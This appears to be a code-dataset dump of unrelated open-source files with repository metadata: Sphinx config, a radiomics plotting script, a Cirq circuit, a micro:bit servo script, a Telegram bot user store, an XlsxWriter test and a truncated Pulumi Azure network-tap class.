# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015.tex', u'Speech-to-text reports from DjangoCon Europe 2015',
u'Hilary Maclean and Sheryll Holley', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015', u'Speech-to-text reports from DjangoCon Europe 2015',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Speech-to-textreportsfromDjangoConEurope2015', u'Speech-to-text reports from DjangoCon Europe 2015',
author, 'Speech-to-textreportsfromDjangoConEurope2015', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
]
| |
e7264ccc6a71876dff805367e13c30b468a009de | 8c80f1220297b91707b42a0baee31365e69d2d1d | /build/lib/WORC/plotting/plotminmaxresponse.py | 3eef97f930d725f863784c0b8d43dbe6a91372e7 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | Sikerdebaard/WORC | 4fca18330513ea0c500a90e770beb345b427d539 | 2c7a23c0a0c7480af378b9e093f06989b3304c8b | refs/heads/master | 2020-05-25T05:02:35.060113 | 2019-05-08T07:02:30 | 2019-05-08T07:02:30 | 187,640,566 | 0 | 0 | null | 2019-05-20T12:56:28 | 2019-05-20T12:56:27 | null | UTF-8 | Python | false | false | 11,356 | py | #!/usr/bin/env python
# Copyright 2016-2019 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pandas as pd
import argparse
import WORC.labels.label_processing as lp
import os
import glob
from natsort import natsorted
import numpy as np
from PREDICT.plotting.getfeatureimages import getfeatureimages
import scipy
def main():
parser = argparse.ArgumentParser(description='Radiomics results')
parser.add_argument('-im', '--im', metavar='im',
nargs='+', dest='im', type=str, required=False,
help='List of patient image files (nii)')
parser.add_argument('-seg', '--seg', metavar='seg',
nargs='+', dest='seg', type=str, required=False,
help='List of patient segmentation files (nii)')
parser.add_argument('-imtest', '--imtest', metavar='imtest',
nargs='+', dest='imtest', type=str, required=False,
help='List of patient image files of test database (nii)')
parser.add_argument('-segtest', '--segtest', metavar='segtest',
nargs='+', dest='segtest', type=str, required=False,
help='List of patient segmentation files of test database (nii)')
parser.add_argument('-feat', '--feat', metavar='feat',
nargs='+', dest='feat', type=str, required=True,
help='List of patient feature files (HDF)')
parser.add_argument('-class', '--class', metavar='class',
nargs='+', dest='classs', type=str, required=True,
help='Classification of patients (text)')
parser.add_argument('-label_type', '--label_type', metavar='label_type',
nargs='+', dest='label_type', type=str, required=True,
help='Name of the label that was predicted')
parser.add_argument('-out', '--out', metavar='out',
nargs='+', dest='out', type=str, required=False,
help='Output folder')
args = parser.parse_args()
if type(args.classs) is list:
args.classs = ''.join(args.classs)
if type(args.label_type) is list:
args.label_type = ''.join(args.label_type)
if type(args.out) is list:
args.out = ''.join(args.out)
if type(args.feat) is list and len(args.feat) == 1:
args.feat = ''.join(args.feat)
if os.path.isdir(args.feat):
args.feat = glob.glob(args.feat + '/features_*.hdf5')
args.feat = natsorted(args.feat)
if type(args.im) is list:
args.im = ''.join(args.im)
if type(args.seg) is list:
args.seg = ''.join(args.seg)
if type(args.imtest) is list:
args.imtest = ''.join(args.imtest)
if type(args.segtest) is list:
args.segtest = ''.join(args.segtest)
# Read and stack the features
print("Reading features.")
image_features_temp = list()
for i_feat in range(len(args.feat)):
feat_temp = pd.read_hdf(args.feat[i_feat])
feat_values = feat_temp.feature_values
feat_labels = feat_temp.feature_labels
feat = {k: v for k, v in zip(feat_labels, feat_values)}
image_features_temp.append(feat)
# Get the labels and patient IDs
print("Reading class labels.")
label_type = args.label_type
label_data, image_features = lp.findlabeldata(args.classs,
label_type,
args.feat,
image_features_temp)
labels = image_features[0].keys()
featvect = dict()
flab = dict()
for l in labels:
featvect[l] = {"all": [], "1": [], "0": []}
flab[l] = {"all": [], "1": [], "0": []}
# Stack per feature type and class
print("Stacking features.")
label = label_data['label'].tolist()[0]
patient_IDs = label_data['patient_IDs'].tolist()
for imfeat, label, pid in zip(image_features, label, patient_IDs):
for fl in labels:
featvect[fl]['all'].append(imfeat[fl])
flab[fl]['all'].append(pid)
if label[0] == 0:
featvect[fl]['0'].append(imfeat[fl])
flab[fl]['0'].append(pid)
else:
featvect[fl]['1'].append(imfeat[fl])
flab[fl]['1'].append(pid)
# Save image of min and max response per feature
image_type = 'CT'
# imname = '/*/*/image.nii.gz'
# segname = '/*/*/seg*.nii.gz'
imname = '/*preop_Tumor.nii.gz'
segname = '/*Tumor_mask.nii.gz'
for fl in labels:
if 'cf_' not in fl:
features = featvect[fl]['all']
maxind = np.argmax(features)
minind = np.argmin(features)
print fl, 'min', patient_IDs[minind]
print fl, 'max', patient_IDs[maxind]
if args.im is not None:
im_min = glob.glob(os.path.join(args.im, patient_IDs[minind]) + imname)
if len(im_min) == 0:
# Search in testing folder
im_min = glob.glob(os.path.join(args.imtest, patient_IDs[minind]) + imname)[0]
else:
im_min = im_min[0]
seg_min = glob.glob(os.path.join(args.seg, patient_IDs[minind]) + segname)
if len(seg_min) == 0:
# Search in testing folder
seg_min = glob.glob(os.path.join(args.segtest, patient_IDs[minind]) + segname)[0]
else:
seg_min = seg_min[0]
im_max = glob.glob(os.path.join(args.im, patient_IDs[maxind]) + imname)
if len(im_max) == 0:
# Search in testing folder
im_max = glob.glob(os.path.join(args.imtest, patient_IDs[maxind]) + imname)[0]
else:
im_max = im_max[0]
seg_max = glob.glob(os.path.join(args.seg, patient_IDs[maxind]) + segname)
if len(seg_max) == 0:
# Search in testing folder
seg_max = glob.glob(os.path.join(args.segtest, patient_IDs[maxind]) + segname)[0]
else:
seg_max = seg_max[0]
if 'LBP' in fl:
# Save LBP image
LBPim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['LBP'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(LBPim, 3)))
LBPim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['LBP'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(LBPim, 3)))
elif 'Gabor' in fl:
# Save Gabor image
Gind = fl.index('Gabor')
Aind = fl.index('A')
gabor_settings = dict()
gabor_settings['gabor_frequencies'] = [float(fl[Gind + 6:Aind])]
try:
gabor_settings['gabor_angles'] = [float(fl[Aind + 1:Aind +1 + 4])]
except ValueError:
# 0.0: two numbers
gabor_settings['gabor_angles'] = [float(fl[Aind + 1:Aind +1 + 3])]
Gaborim = getfeatureimages(im_min, seg_min,
image_type=image_type,
gabor_settings=gabor_settings,
types=['Gabor'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Gaborim, 3)))
Gaborim = getfeatureimages(im_max, seg_max,
image_type=image_type,
gabor_settings=gabor_settings,
types=['Gabor'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Gaborim, 3)))
elif 'sf_' in fl or 'hf_' in fl or 'tf_GL' in fl:
# Save segmentation
Shapeim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['Shape'])[0]
filename = fl + '_min_' + patient_IDs[minind] + '_seg.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Shapeim, 3)))
Shapeim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['Shape'])[0]
filename = fl + '_max_' + patient_IDs[maxind] + '_seg.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Shapeim, 3)))
# Save images
Histogramim = getfeatureimages(im_min, seg_min,
image_type=image_type,
types=['Histogram'])[0]
Histogramim[Histogramim == -1000] = 0
filename = fl + '_min_' + patient_IDs[minind] + '_im.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Histogramim, 3)))
Histogramim = getfeatureimages(im_max, seg_max,
image_type=image_type,
types=['Histogram'])[0]
Histogramim[Histogramim == -1000] = 0
filename = fl + '_max_' + patient_IDs[maxind] + '_im.png'
savename = os.path.join(args.out, filename)
scipy.misc.imsave(savename, np.fliplr(np.rot90(Histogramim, 3)))
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
55c2841b5ae6ddfc0e8c0cb6f34e33306f5fca3a | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/cirq_new/cirq_program/startCirq_pragma58.py | 8e84b65dd9e10c0774f2965011964ccb0cbd933f | [
"BSD-3-Clause"
]
| permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=11
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
class Opty(cirq.PointOptimizer):
def optimization_at(
self,
circuit: 'cirq.Circuit',
index: int,
op: 'cirq.Operation'
) -> Optional[cirq.PointOptimizationSummary]:
if (isinstance(op, cirq.ops.GateOperation) and isinstance(op.gate, cirq.CZPowGate)):
return cirq.PointOptimizationSummary(
clear_span=1,
clear_qubits=op.qubits,
new_operations=[
cirq.CZ(*op.qubits),
cirq.X.on_each(*op.qubits),
cirq.X.on_each(*op.qubits),
]
)
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.rx(1.6147786239451536).on(input_qubit[3])) # number=5
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=8
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[0])) # number=10
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=7
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_pragma58.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
]
| |
8dd7a8369a2f7b352443bc0d36d23dd32bcc554e | bf576b059cbecb0cbb8a6c885dcfded5bd685399 | /4.Python course/3.Expand course/1.Small windmill/Small windmill.py | 18c56da878b1cb6a7ef0d38234ce809b1bea040f | []
| no_license | YahboomTechnology/Superbit-expansion-board | 0d3c2fd06c5df9280d230af429931af2c48dc6d5 | 4df7e03426d486d2b2f8f649359eee2d62851083 | refs/heads/master | 2023-04-07T03:16:15.786669 | 2023-03-29T01:12:57 | 2023-03-29T01:12:57 | 206,778,307 | 13 | 8 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from microbit import *
import superbit
a = 135
display.show(Image.HEART)
superbit.servo270(superbit.S1, 135)
superbit.motor_control(superbit.M1, 255, 0)
while True:
if button_a.is_pressed():
a = a - 1
if a < 0:
a = 0
superbit.servo270(superbit.S1, a)
elif button_b.is_pressed():
a = a + 1
if a > 270:
a = 270
superbit.servo270(superbit.S1, a)
| [
"[email protected]"
]
| |
0ab091f1bac3f6b3782abb3cf2f34ba686b858fc | 6dcd5f4bb4c39e2d887e5d557e188ba4c8a75081 | /src/UsersDB.py | 3d3f2264fceef218c5169ec87a6f6ca4b65d695f | []
| no_license | Pella86/HappyRateBot | 815653033593aedc22c779025d00bddec4614f46 | f23f786a3c9dc19f2378958470d82974d018bd64 | refs/heads/master | 2020-03-22T00:16:38.670215 | 2018-07-22T11:50:53 | 2018-07-22T11:50:53 | 139,234,809 | 1 | 1 | null | 2018-07-22T06:41:21 | 2018-06-30T09:01:21 | Python | UTF-8 | Python | false | false | 4,288 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 20 12:10:14 2018
@author: Mauro
"""
#==============================================================================
# Imports
#==============================================================================
# py imports
import os
import hashlib
import string
# my imports
import Databases
import UserProfile
import random
import Logging
#==============================================================================
# logging
#==============================================================================
# create logger
log = Logging.get_logger(__name__, "WARNING")
#==============================================================================
# Helpers
#==============================================================================
def get_hash_id(personid):
pid = hashlib.sha256()
pid.update(bytes(personid))
return pid.digest()
#==============================================================================
# User database
#==============================================================================
class UsersDB:
def __init__(self):
self.folder = "./databases/user_db"
if not os.path.isdir(self.folder):
os.mkdir(self.folder)
self.database = Databases.Database(self.folder, "user_")
self.database.loadDB()
self.database.update_uid()
log.info("loaded users database")
folder = "./databases/banned_user_db"
if not os.path.isdir(folder):
os.mkdir(folder)
self.banned_database = Databases.Database(folder, "banned_user_")
def getUsersList(self):
return self.database.getValues()
def check_nickname(self, user, text):
error_message = None
alphanumeric = string.ascii_letters + string.digits
if len(text) < 3:
error_message = "too short"
elif len(text) >= 15:
error_message = "too long"
elif not all(c in alphanumeric for c in text):
error_message = "invalid character"
elif text in [u.display_id for u in self.database.getValues()]:
error_message = "already present"
if error_message is None:
user.display_id = text
self.database[user.hash_id].setData(user)
return True
else:
return error_message
def banUser(self, user):
duser = self.database[user.hash_id]
self.deleteUser(user)
def addUser(self, person, chatid):
# hash the id
hash_id = get_hash_id(person.id)
if self.database.isNew(hash_id):
log.info("added new user to database: {}".format(self.database.short_uid))
# create a unique display id
start_number = 0x10000000
stop_number = 0xFFFFFFFF
display_id = random.randint(start_number,stop_number)
log.debug("display id {}".format(display_id))
# check for uniqueness
display_id_list = [user.display_id for user in self.database.getValues()]
while display_id in display_id_list:
display_id = random.randint(start_number,stop_number)
log.debug("new display id {}".format(display_id))
# language
lang_tag = person.language_code if person.language_code else "en"
# user instance
user = UserProfile.UserProfile(hash_id, display_id, chatid, lang_tag)
data = Databases.Data(hash_id, user)
self.database.addData(data)
def deleteUser(self, user):
data = self.database[user.hash_id]
self.database.deleteItem(data)
def hGetUser(self, hash_id):
return self.database[hash_id].getData()
def getUser(self, person):
log.debug("User already in database, got user")
hash_id = get_hash_id(person.id)
return self.database[hash_id].getData()
def setUser(self, user):
self.database[user.hash_id].setData(user)
def update(self):
log.info("updating database...")
self.database.updateDB()
| [
"[email protected]"
]
| |
9980f2825f02826d27018b266928c8e25ef4e7d6 | 978248bf0f275ae688f194593aa32c267832b2b6 | /xlsxwriter/test/comparison/test_autofilter06.py | 354f84b2a2f1d14959c2854587b7e266fc15c235 | [
"BSD-2-Clause-Views"
]
| permissive | satish1337/XlsxWriter | b0c216b91be1b74d6cac017a152023aa1d581de2 | 0ab9bdded4f750246c41a439f6a6cecaf9179030 | refs/heads/master | 2021-01-22T02:35:13.158752 | 2015-03-31T20:32:28 | 2015-03-31T20:32:28 | 33,300,989 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,859 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'autofilter06.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.txt_filename = test_dir + 'xlsx_files/' + 'autofilter_data.txt'
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a simple XlsxWriter file with an autofilter.
This test corresponds to the following examples/autofilter.pl example:
Example 6. Autofilter with filter for non-blanks.
"""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
# Set the autofilter.
worksheet.autofilter('A1:D51')
# Add filter criteria.
worksheet.filter_column(0, 'x == NonBlanks')
# Open a text file with autofilter example data.
textfile = open(self.txt_filename)
# Read the headers from the first line of the input file.
headers = textfile.readline().strip("\n").split()
# Write out the headers.
worksheet.write_row('A1', headers)
# Start writing data after the headers.
row = 1
# Read the rest of the text file and write it to the worksheet.
for line in textfile:
# Split the input data based on whitespace.
data = line.strip("\n").split()
# Convert the number data from the text file.
for i, item in enumerate(data):
try:
data[i] = float(item)
except ValueError:
pass
# Simulate a blank cell in the data.
if row == 6:
data[0] = ''
# Get some of the field data.
region = data[0]
# Check for rows that match the filter.
if region != '':
# Row matches the filter, no further action required.
pass
else:
# We need to hide rows that don't match the filter.
worksheet.set_row(row, options={'hidden': True})
# Write out the row data.
worksheet.write_row(row, 0, data)
# Move on to the next worksheet row.
row += 1
textfile.close()
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
]
| |
108e02ca3f0e8e3ea1c4460e16956878f2407df1 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/network/virtual_network_tap.py | bcdbaf91e38252e9c1258aa4d97c8130368e7538 | [
"BSD-3-Clause",
"Apache-2.0"
]
| permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,511 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkTapInitArgs', 'VirtualNetworkTap']
@pulumi.input_type
class VirtualNetworkTapInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input['FrontendIPConfigurationArgs']] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VirtualNetworkTap resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input['FrontendIPConfigurationArgs'] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input['NetworkInterfaceIPConfigurationArgs'] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if destination_load_balancer_front_end_ip_configuration is not None:
pulumi.set(__self__, "destination_load_balancer_front_end_ip_configuration", destination_load_balancer_front_end_ip_configuration)
if destination_network_interface_ip_configuration is not None:
pulumi.set(__self__, "destination_network_interface_ip_configuration", destination_network_interface_ip_configuration)
if destination_port is not None:
pulumi.set(__self__, "destination_port", destination_port)
if id is not None:
pulumi.set(__self__, "id", id)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tap_name is not None:
pulumi.set(__self__, "tap_name", tap_name)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> Optional[pulumi.Input['FrontendIPConfigurationArgs']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@destination_load_balancer_front_end_ip_configuration.setter
def destination_load_balancer_front_end_ip_configuration(self, value: Optional[pulumi.Input['FrontendIPConfigurationArgs']]):
pulumi.set(self, "destination_load_balancer_front_end_ip_configuration", value)
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@destination_network_interface_ip_configuration.setter
def destination_network_interface_ip_configuration(self, value: Optional[pulumi.Input['NetworkInterfaceIPConfigurationArgs']]):
pulumi.set(self, "destination_network_interface_ip_configuration", value)
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> Optional[pulumi.Input[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@destination_port.setter
def destination_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "destination_port", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tapName")
def tap_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the virtual network tap.
"""
return pulumi.get(self, "tap_name")
@tap_name.setter
def tap_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tap_name", value)
class VirtualNetworkTap(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Virtual Network Tap resource.
API Version: 2020-11-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualNetworkTapInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Virtual Network Tap resource.
API Version: 2020-11-01.
:param str resource_name: The name of the resource.
:param VirtualNetworkTapInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualNetworkTapInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualNetworkTapInitArgs.__new__(VirtualNetworkTapInitArgs)
__props__.__dict__["destination_load_balancer_front_end_ip_configuration"] = destination_load_balancer_front_end_ip_configuration
__props__.__dict__["destination_network_interface_ip_configuration"] = destination_network_interface_ip_configuration
__props__.__dict__["destination_port"] = destination_port
__props__.__dict__["id"] = id
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["tap_name"] = tap_name
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interface_tap_configurations"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkTap"), 